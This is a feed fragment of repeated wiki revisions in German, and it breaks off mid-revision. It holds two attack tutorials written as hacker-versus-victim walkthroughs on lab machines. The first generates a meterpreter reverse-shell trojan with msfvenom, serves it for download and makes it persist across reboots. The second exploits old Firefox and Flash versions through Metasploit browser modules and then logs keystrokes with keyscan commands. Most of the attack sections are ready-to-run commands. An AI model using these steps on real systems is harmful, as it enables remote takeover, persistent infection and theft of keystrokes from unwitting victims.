		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18422"/>
		<updated>2019-09-02T10:03:37Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* Dauerhaft infizieren */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Setup Hacker &lt;br /&gt;
 Kali linux&lt;br /&gt;
 ip:  192.168.242.91&lt;br /&gt;
&lt;br /&gt;
Setup Opfer&lt;br /&gt;
 Windows 7 Domain Rechner&lt;br /&gt;
 Benutzer: Admin&lt;br /&gt;
 ip:  192.168.242.76&lt;br /&gt;
&lt;br /&gt;
=Create trojan=&lt;br /&gt;
*LHOST=&amp;quot;10.81.1.1&amp;quot;&lt;br /&gt;
*LPORT=&amp;quot;7777&amp;quot;&lt;br /&gt;
LHOST ist der Rechner den der Client spaeter connecten ...&lt;br /&gt;
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe &amp;gt; program.exe&lt;br /&gt;
&lt;br /&gt;
[[Datei:7 trojaner.png]]&lt;br /&gt;
&lt;br /&gt;
=defer the program to the target=&lt;br /&gt;
das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an&lt;br /&gt;
&lt;br /&gt;
 cp program.exe /var/www/html/&lt;br /&gt;
 rm /var/www/html/index.html&lt;br /&gt;
 ifconfig&lt;br /&gt;
 netstat -lntp&lt;br /&gt;
 service apache2 restart &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:8 opfer.png]]&lt;br /&gt;
&lt;br /&gt;
auf der opfer Seite&lt;br /&gt;
&lt;br /&gt;
[[Datei:12 schadeware.png]]&lt;br /&gt;
&lt;br /&gt;
=take control=&lt;br /&gt;
&lt;br /&gt;
nun starten wir erst metasploit und danach armitage (linke leiste)&lt;br /&gt;
&lt;br /&gt;
[[Datei:mframe.png]]&lt;br /&gt;
&lt;br /&gt;
Standard Einstellung beibehalten weitere Meldungen einfach bestätigen&lt;br /&gt;
&lt;br /&gt;
[[Datei:amriamstarten.png]]&lt;br /&gt;
&lt;br /&gt;
[[Datei:1armitagestarten.png]]&lt;br /&gt;
&lt;br /&gt;
wenn armitage gestartet ist erstellen wir einen Server zum lauschen&lt;br /&gt;
*payload&lt;br /&gt;
**windows&lt;br /&gt;
***metapreter&lt;br /&gt;
&lt;br /&gt;
hier passen wir den LPORT an&lt;br /&gt;
&lt;br /&gt;
und warten darauf das sich unser opfer verbindet&lt;br /&gt;
&lt;br /&gt;
nun erscheint oben rechts der opfer Computer&lt;br /&gt;
&lt;br /&gt;
(durch links klick auswählen)&lt;br /&gt;
&lt;br /&gt;
=Permanently infect=&lt;br /&gt;
&lt;br /&gt;
als nächstes wollen wir den Trojaner dauerhaft speichern &lt;br /&gt;
&lt;br /&gt;
wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:200persist.png]]&lt;br /&gt;
&lt;br /&gt;
wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden&lt;br /&gt;
&lt;br /&gt;
diese kann ein par Minuten dauern&lt;br /&gt;
&lt;br /&gt;
=Was kann man machen=&lt;br /&gt;
jetzt gibt es viele Möglichkeiten&lt;br /&gt;
*Rechtsklick infizierter pc&lt;br /&gt;
**meterpreter&lt;br /&gt;
***explore&lt;br /&gt;
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw&lt;br /&gt;
&lt;br /&gt;
=kurz Beispiel keylogger=&lt;br /&gt;
&lt;br /&gt;
[[metasploit &amp;amp; armitage keylogger]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18421</id>
		<title>Metasploit &amp; armitage trojaner</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18421"/>
		<updated>2019-09-02T10:02:46Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* Kontrolle übernehmen */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Setup Hacker &lt;br /&gt;
 Kali linux&lt;br /&gt;
 ip:  192.168.242.91&lt;br /&gt;
&lt;br /&gt;
Setup Opfer&lt;br /&gt;
 Windows 7 Domain Rechner&lt;br /&gt;
 Benutzer: Admin&lt;br /&gt;
 ip:  192.168.242.76&lt;br /&gt;
&lt;br /&gt;
=Create trojan=&lt;br /&gt;
*LHOST=&amp;quot;10.81.1.1&amp;quot;&lt;br /&gt;
*LPORT=&amp;quot;7777&amp;quot;&lt;br /&gt;
LHOST ist der Rechner den der Client spaeter connecten ...&lt;br /&gt;
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe &amp;gt; program.exe&lt;br /&gt;
&lt;br /&gt;
[[Datei:7 trojaner.png]]&lt;br /&gt;
&lt;br /&gt;
=defer the program to the target=&lt;br /&gt;
das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an&lt;br /&gt;
&lt;br /&gt;
 cp program.exe /var/www/html/&lt;br /&gt;
 rm /var/www/html/index.html&lt;br /&gt;
 ifconfig&lt;br /&gt;
 netstat -lntp&lt;br /&gt;
 service apache2 restart &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:8 opfer.png]]&lt;br /&gt;
&lt;br /&gt;
auf der opfer Seite&lt;br /&gt;
&lt;br /&gt;
[[Datei:12 schadeware.png]]&lt;br /&gt;
&lt;br /&gt;
=take control=&lt;br /&gt;
&lt;br /&gt;
nun starten wir erst metasploit und danach armitage (linke leiste)&lt;br /&gt;
&lt;br /&gt;
[[Datei:mframe.png]]&lt;br /&gt;
&lt;br /&gt;
Standard Einstellung beibehalten weitere Meldungen einfach bestätigen&lt;br /&gt;
&lt;br /&gt;
[[Datei:amriamstarten.png]]&lt;br /&gt;
&lt;br /&gt;
[[Datei:1armitagestarten.png]]&lt;br /&gt;
&lt;br /&gt;
wenn armitage gestartet ist erstellen wir einen Server zum lauschen&lt;br /&gt;
*payload&lt;br /&gt;
**windows&lt;br /&gt;
***metapreter&lt;br /&gt;
&lt;br /&gt;
hier passen wir den LPORT an&lt;br /&gt;
&lt;br /&gt;
und warten darauf das sich unser opfer verbindet&lt;br /&gt;
&lt;br /&gt;
nun erscheint oben rechts der opfer Computer&lt;br /&gt;
&lt;br /&gt;
(durch links klick auswählen)&lt;br /&gt;
&lt;br /&gt;
=Dauerhaft infizieren=&lt;br /&gt;
&lt;br /&gt;
als nächstes wollen wir den Trojaner dauerhaft speichern &lt;br /&gt;
&lt;br /&gt;
wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:200persist.png]]&lt;br /&gt;
&lt;br /&gt;
wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden&lt;br /&gt;
&lt;br /&gt;
diese kann ein par Minuten dauern&lt;br /&gt;
&lt;br /&gt;
=Was kann man machen=&lt;br /&gt;
jetzt gibt es viele Möglichkeiten&lt;br /&gt;
*Rechtsklick infizierter pc&lt;br /&gt;
**meterpreter&lt;br /&gt;
***explore&lt;br /&gt;
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw&lt;br /&gt;
&lt;br /&gt;
=kurz Beispiel keylogger=&lt;br /&gt;
&lt;br /&gt;
[[metasploit &amp;amp; armitage keylogger]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18420</id>
		<title>Metasploit &amp; armitage trojaner</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18420"/>
		<updated>2019-09-02T10:02:01Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* dem opfer das Programm unterschieben */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Setup Hacker &lt;br /&gt;
 Kali linux&lt;br /&gt;
 ip:  192.168.242.91&lt;br /&gt;
&lt;br /&gt;
Setup Opfer&lt;br /&gt;
 Windows 7 Domain Rechner&lt;br /&gt;
 Benutzer: Admin&lt;br /&gt;
 ip:  192.168.242.76&lt;br /&gt;
&lt;br /&gt;
=Create trojan=&lt;br /&gt;
*LHOST=&amp;quot;10.81.1.1&amp;quot;&lt;br /&gt;
*LPORT=&amp;quot;7777&amp;quot;&lt;br /&gt;
LHOST ist der Rechner den der Client spaeter connecten ...&lt;br /&gt;
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe &amp;gt; program.exe&lt;br /&gt;
&lt;br /&gt;
[[Datei:7 trojaner.png]]&lt;br /&gt;
&lt;br /&gt;
=defer the program to the target=&lt;br /&gt;
das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an&lt;br /&gt;
&lt;br /&gt;
 cp program.exe /var/www/html/&lt;br /&gt;
 rm /var/www/html/index.html&lt;br /&gt;
 ifconfig&lt;br /&gt;
 netstat -lntp&lt;br /&gt;
 service apache2 restart &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:8 opfer.png]]&lt;br /&gt;
&lt;br /&gt;
auf der opfer Seite&lt;br /&gt;
&lt;br /&gt;
[[Datei:12 schadeware.png]]&lt;br /&gt;
&lt;br /&gt;
=Kontrolle übernehmen=&lt;br /&gt;
&lt;br /&gt;
nun starten wir erst metasploit und danach armitage (linke leiste)&lt;br /&gt;
&lt;br /&gt;
[[Datei:mframe.png]]&lt;br /&gt;
&lt;br /&gt;
Standard Einstellung beibehalten weitere Meldungen einfach bestätigen&lt;br /&gt;
&lt;br /&gt;
[[Datei:amriamstarten.png]]&lt;br /&gt;
&lt;br /&gt;
[[Datei:1armitagestarten.png]]&lt;br /&gt;
&lt;br /&gt;
wenn armitage gestartet ist erstellen wir einen Server zum lauschen&lt;br /&gt;
*payload&lt;br /&gt;
**windows&lt;br /&gt;
***metapreter&lt;br /&gt;
&lt;br /&gt;
hier passen wir den LPORT an&lt;br /&gt;
&lt;br /&gt;
und warten darauf das sich unser opfer verbindet&lt;br /&gt;
&lt;br /&gt;
nun erscheint oben rechts der opfer Computer&lt;br /&gt;
&lt;br /&gt;
(durch links klick auswählen)&lt;br /&gt;
&lt;br /&gt;
=Dauerhaft infizieren=&lt;br /&gt;
&lt;br /&gt;
als nächstes wollen wir den Trojaner dauerhaft speichern &lt;br /&gt;
&lt;br /&gt;
wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:200persist.png]]&lt;br /&gt;
&lt;br /&gt;
wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden&lt;br /&gt;
&lt;br /&gt;
diese kann ein par Minuten dauern&lt;br /&gt;
&lt;br /&gt;
=Was kann man machen=&lt;br /&gt;
jetzt gibt es viele Möglichkeiten&lt;br /&gt;
*Rechtsklick infizierter pc&lt;br /&gt;
**meterpreter&lt;br /&gt;
***explore&lt;br /&gt;
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw&lt;br /&gt;
&lt;br /&gt;
=kurz Beispiel keylogger=&lt;br /&gt;
&lt;br /&gt;
[[metasploit &amp;amp; armitage keylogger]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18419</id>
		<title>Metasploit &amp; armitage trojaner</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_%26_armitage_trojaner&amp;diff=18419"/>
		<updated>2019-09-02T10:00:54Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* Trojaner erstellen */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Setup Hacker &lt;br /&gt;
 Kali linux&lt;br /&gt;
 ip:  192.168.242.91&lt;br /&gt;
&lt;br /&gt;
Setup Opfer&lt;br /&gt;
 Windows 7 Domain Rechner&lt;br /&gt;
 Benutzer: Admin&lt;br /&gt;
 ip:  192.168.242.76&lt;br /&gt;
&lt;br /&gt;
=Create trojan=&lt;br /&gt;
*LHOST=&amp;quot;10.81.1.1&amp;quot;&lt;br /&gt;
*LPORT=&amp;quot;7777&amp;quot;&lt;br /&gt;
LHOST ist der Rechner den der Client spaeter connecten ...&lt;br /&gt;
*msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe &amp;gt; program.exe&lt;br /&gt;
&lt;br /&gt;
[[Datei:7 trojaner.png]]&lt;br /&gt;
&lt;br /&gt;
=dem opfer das Programm unterschieben=&lt;br /&gt;
das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an&lt;br /&gt;
&lt;br /&gt;
 cp program.exe /var/www/html/&lt;br /&gt;
 rm /var/www/html/index.html&lt;br /&gt;
 ifconfig&lt;br /&gt;
 netstat -lntp&lt;br /&gt;
 service apache2 restart &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:8 opfer.png]]&lt;br /&gt;
&lt;br /&gt;
auf der opfer Seite&lt;br /&gt;
&lt;br /&gt;
[[Datei:12 schadeware.png]]&lt;br /&gt;
&lt;br /&gt;
=Kontrolle übernehmen=&lt;br /&gt;
&lt;br /&gt;
nun starten wir erst metasploit und danach armitage (linke leiste)&lt;br /&gt;
&lt;br /&gt;
[[Datei:mframe.png]]&lt;br /&gt;
&lt;br /&gt;
Standard Einstellung beibehalten weitere Meldungen einfach bestätigen&lt;br /&gt;
&lt;br /&gt;
[[Datei:amriamstarten.png]]&lt;br /&gt;
&lt;br /&gt;
[[Datei:1armitagestarten.png]]&lt;br /&gt;
&lt;br /&gt;
wenn armitage gestartet ist erstellen wir einen Server zum lauschen&lt;br /&gt;
*payload&lt;br /&gt;
**windows&lt;br /&gt;
***metapreter&lt;br /&gt;
&lt;br /&gt;
hier passen wir den LPORT an&lt;br /&gt;
&lt;br /&gt;
und warten darauf das sich unser opfer verbindet&lt;br /&gt;
&lt;br /&gt;
nun erscheint oben rechts der opfer Computer&lt;br /&gt;
&lt;br /&gt;
(durch links klick auswählen)&lt;br /&gt;
&lt;br /&gt;
=Dauerhaft infizieren=&lt;br /&gt;
&lt;br /&gt;
als nächstes wollen wir den Trojaner dauerhaft speichern &lt;br /&gt;
&lt;br /&gt;
wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Datei:200persist.png]]&lt;br /&gt;
&lt;br /&gt;
wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden&lt;br /&gt;
&lt;br /&gt;
diese kann ein par Minuten dauern&lt;br /&gt;
&lt;br /&gt;
=Was kann man machen=&lt;br /&gt;
jetzt gibt es viele Möglichkeiten&lt;br /&gt;
*Rechtsklick infizierter pc&lt;br /&gt;
**meterpreter&lt;br /&gt;
***explore&lt;br /&gt;
hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw&lt;br /&gt;
&lt;br /&gt;
=kurz Beispiel keylogger=&lt;br /&gt;
&lt;br /&gt;
[[metasploit &amp;amp; armitage keylogger]]&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18418</id>
		<title>Metasploit browser Exlpoit</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18418"/>
		<updated>2019-09-02T09:58:47Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* vorgehnsweise */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Setup Opfer=&lt;br /&gt;
Winxp Service pack 3&lt;br /&gt;
Firefox 3.5&lt;br /&gt;
&lt;br /&gt;
=Setup Hacker=&lt;br /&gt;
Kali Linux&lt;br /&gt;
ip: 192.168.242.53&lt;br /&gt;
&lt;br /&gt;
=Action=&lt;br /&gt;
starte metasploit&lt;br /&gt;
 msfconsole&lt;br /&gt;
&lt;br /&gt;
 use exploit/multi/browser/firefox_escape_retval&lt;br /&gt;
 set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
 set lhost 192.168.242.53 (lokaler Host)&lt;br /&gt;
 set svrhost 192.168.242.53 (HTTP-Server IP)&lt;br /&gt;
 set svrport 8888 (HTTP-Server Port)&lt;br /&gt;
 set lport 4444 (lokaler Port)&lt;br /&gt;
 set uripath /hack (optional)&lt;br /&gt;
 exploit&lt;br /&gt;
&lt;br /&gt;
 jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack&lt;br /&gt;
 wenn wir meterpreter &amp;gt; sehen hat der exploit funktioniert &lt;br /&gt;
&lt;br /&gt;
 session - i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
=Win7 32bit Exploit=&lt;br /&gt;
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Setup Opfer&lt;br /&gt;
&lt;br /&gt;
win732 bit&lt;br /&gt;
&lt;br /&gt;
adobeflash 17.0.0.134&lt;br /&gt;
&lt;br /&gt;
firefox&lt;br /&gt;
&lt;br /&gt;
TeamViewer ID 597 708 786&lt;br /&gt;
&lt;br /&gt;
==Hackersystem==&lt;br /&gt;
kali linux&lt;br /&gt;
&lt;br /&gt;
ip 192.168.244.50&lt;br /&gt;
&lt;br /&gt;
===on the console===&lt;br /&gt;
metasploit konsole starten&lt;br /&gt;
*msfconsole&lt;br /&gt;
auswahl des exploits&lt;br /&gt;
*use exploit/windows/browser/adobe_flash_domain_memory_uaf&lt;br /&gt;
auswahl der schadsoftware&lt;br /&gt;
*set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
setzen des localhost&lt;br /&gt;
*set lhost 192.168.244.50&lt;br /&gt;
setzen des webservers&lt;br /&gt;
*set srvhost 192.168.244.50&lt;br /&gt;
pfad zum hack&lt;br /&gt;
*set uripath /hack&lt;br /&gt;
ausführen des exploits&lt;br /&gt;
*exploit&lt;br /&gt;
&lt;br /&gt;
=on the target=&lt;br /&gt;
*gehen mit win7 auf http://192.168.244.150:8080/hack&lt;br /&gt;
&lt;br /&gt;
=on the hackersystem=&lt;br /&gt;
==commandos==&lt;br /&gt;
 sessions -l (listet die sessions)&lt;br /&gt;
 sessions -i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
==method==&lt;br /&gt;
session betreten&lt;br /&gt;
*msf exploit(adobe_flash_domain_memory_uaf) &amp;gt; sessions -i 1&lt;br /&gt;
ps listing&lt;br /&gt;
*meterpreter &amp;gt; ps&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18417</id>
		<title>Metasploit browser Exlpoit</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18417"/>
		<updated>2019-09-02T09:57:51Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* auf dem hackersystem */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Setup Opfer=&lt;br /&gt;
Winxp Service pack 3&lt;br /&gt;
Firefox 3.5&lt;br /&gt;
&lt;br /&gt;
=Setup Hacker=&lt;br /&gt;
Kali Linux&lt;br /&gt;
ip: 192.168.242.53&lt;br /&gt;
&lt;br /&gt;
=Action=&lt;br /&gt;
starte metasploit&lt;br /&gt;
 msfconsole&lt;br /&gt;
&lt;br /&gt;
 use exploit/multi/browser/firefox_escape_retval&lt;br /&gt;
 set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
 set lhost 192.168.242.53 (lokaler Host)&lt;br /&gt;
 set svrhost 192.168.242.53 (HTTP-Server IP)&lt;br /&gt;
 set svrport 8888 (HTTP-Server Port)&lt;br /&gt;
 set lport 4444 (lokaler Port)&lt;br /&gt;
 set uripath /hack (optional)&lt;br /&gt;
 exploit&lt;br /&gt;
&lt;br /&gt;
 jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack&lt;br /&gt;
 wenn wir meterpreter &amp;gt; sehen hat der exploit funktioniert &lt;br /&gt;
&lt;br /&gt;
 session - i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
=Win7 32bit Exploit=&lt;br /&gt;
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Setup Opfer&lt;br /&gt;
&lt;br /&gt;
win732 bit&lt;br /&gt;
&lt;br /&gt;
adobeflash 17.0.0.134&lt;br /&gt;
&lt;br /&gt;
firefox&lt;br /&gt;
&lt;br /&gt;
TeamViewer ID 597 708 786&lt;br /&gt;
&lt;br /&gt;
==Hackersystem==&lt;br /&gt;
kali linux&lt;br /&gt;
&lt;br /&gt;
ip 192.168.244.50&lt;br /&gt;
&lt;br /&gt;
===on the console===&lt;br /&gt;
metasploit konsole starten&lt;br /&gt;
*msfconsole&lt;br /&gt;
auswahl des exploits&lt;br /&gt;
*use exploit/windows/browser/adobe_flash_domain_memory_uaf&lt;br /&gt;
auswahl der schadsoftware&lt;br /&gt;
*set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
setzen des localhost&lt;br /&gt;
*set lhost 192.168.244.50&lt;br /&gt;
setzen des webservers&lt;br /&gt;
*set srvhost 192.168.244.50&lt;br /&gt;
pfad zum hack&lt;br /&gt;
*set uripath /hack&lt;br /&gt;
ausführen des exploits&lt;br /&gt;
*exploit&lt;br /&gt;
&lt;br /&gt;
=on the target=&lt;br /&gt;
*gehen mit win7 auf http://192.168.244.150:8080/hack&lt;br /&gt;
&lt;br /&gt;
=on the hackersystem=&lt;br /&gt;
==commandos==&lt;br /&gt;
 sessions -l (listet die sessions)&lt;br /&gt;
 sessions -i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
==vorgehnsweise==&lt;br /&gt;
session betreten&lt;br /&gt;
*msf exploit(adobe_flash_domain_memory_uaf) &amp;gt; sessions -i 1&lt;br /&gt;
ps listing&lt;br /&gt;
*meterpreter &amp;gt; ps&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18416</id>
		<title>Metasploit browser Exlpoit</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18416"/>
		<updated>2019-09-02T09:57:27Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* auf dem opfer */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Setup Opfer=&lt;br /&gt;
Winxp Service pack 3&lt;br /&gt;
Firefox 3.5&lt;br /&gt;
&lt;br /&gt;
=Setup Hacker=&lt;br /&gt;
Kali Linux&lt;br /&gt;
ip: 192.168.242.53&lt;br /&gt;
&lt;br /&gt;
=Action=&lt;br /&gt;
starte metasploit&lt;br /&gt;
 msfconsole&lt;br /&gt;
&lt;br /&gt;
 use exploit/multi/browser/firefox_escape_retval&lt;br /&gt;
 set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
 set lhost 192.168.242.53 (lokaler Host)&lt;br /&gt;
 set svrhost 192.168.242.53 (HTTP-Server IP)&lt;br /&gt;
 set svrport 8888 (HTTP-Server Port)&lt;br /&gt;
 set lport 4444 (lokaler Port)&lt;br /&gt;
 set uripath /hack (optional)&lt;br /&gt;
 exploit&lt;br /&gt;
&lt;br /&gt;
 jetzt muss das opfer mit dem fierfox diese url aufrufen http://192.168.242.53:8888/hack&lt;br /&gt;
 wenn wir meterpreter &amp;gt; sehen hat der exploit funktioniert &lt;br /&gt;
&lt;br /&gt;
 session - i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
=Win7 32bit Exploit=&lt;br /&gt;
http://high54security.blogspot.de/2015/05/exploiting-flash-1700134-using.html&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Setup Opfer&lt;br /&gt;
&lt;br /&gt;
win732 bit&lt;br /&gt;
&lt;br /&gt;
adobeflash 17.0.0.134&lt;br /&gt;
&lt;br /&gt;
firefox&lt;br /&gt;
&lt;br /&gt;
TeamViewer ID 597 708 786&lt;br /&gt;
&lt;br /&gt;
==Hackersystem==&lt;br /&gt;
kali linux&lt;br /&gt;
&lt;br /&gt;
ip 192.168.244.50&lt;br /&gt;
&lt;br /&gt;
===on the console===&lt;br /&gt;
metasploit konsole starten&lt;br /&gt;
*msfconsole&lt;br /&gt;
auswahl des exploits&lt;br /&gt;
*use exploit/windows/browser/adobe_flash_domain_memory_uaf&lt;br /&gt;
auswahl der schadsoftware&lt;br /&gt;
*set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
setzen des localhost&lt;br /&gt;
*set lhost 192.168.244.50&lt;br /&gt;
setzen des webservers&lt;br /&gt;
*set srvhost 192.168.244.50&lt;br /&gt;
pfad zum hack&lt;br /&gt;
*set uripath /hack&lt;br /&gt;
ausführen des exploits&lt;br /&gt;
*exploit&lt;br /&gt;
&lt;br /&gt;
=on the target=&lt;br /&gt;
*gehen mit win7 auf http://192.168.244.150:8080/hack&lt;br /&gt;
&lt;br /&gt;
=auf dem hackersystem=&lt;br /&gt;
==commandos==&lt;br /&gt;
 sessions -l (listet die sessions)&lt;br /&gt;
 sessions -i 1 (in die session gehen)&lt;br /&gt;
 sessions -h (zeigt optionen)&lt;br /&gt;
 ps (zeigt prozesse)&lt;br /&gt;
 migrate PSID (verschiebt in den prozess Z.b explorer.exe)&lt;br /&gt;
 getpid (zeigt momentanen prozess)&lt;br /&gt;
 keyscan_start (startet den keyloger)&lt;br /&gt;
 keyscan_dump (zeigt aufzeichnungen)&lt;br /&gt;
 keyscan_stop (stopt keyloger)&lt;br /&gt;
&lt;br /&gt;
==vorgehnsweise==&lt;br /&gt;
session betreten&lt;br /&gt;
*msf exploit(adobe_flash_domain_memory_uaf) &amp;gt; sessions -i 1&lt;br /&gt;
ps listing&lt;br /&gt;
*meterpreter &amp;gt; ps&lt;/div&gt;</summary>
		<author><name>Joshua.schreiner</name></author>
	</entry>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18415</id>
		<title>Metasploit browser Exlpoit</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=Metasploit_browser_Exlpoit&amp;diff=18415"/>
		<updated>2019-09-02T09:56:06Z</updated>

		<summary type="html">&lt;p&gt;Joshua.schreiner: /* auf der konsole */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Setup Opfer=&lt;br /&gt;
Winxp Service pack 3&lt;br /&gt;
Firefox 3.5&lt;br /&gt;
&lt;br /&gt;
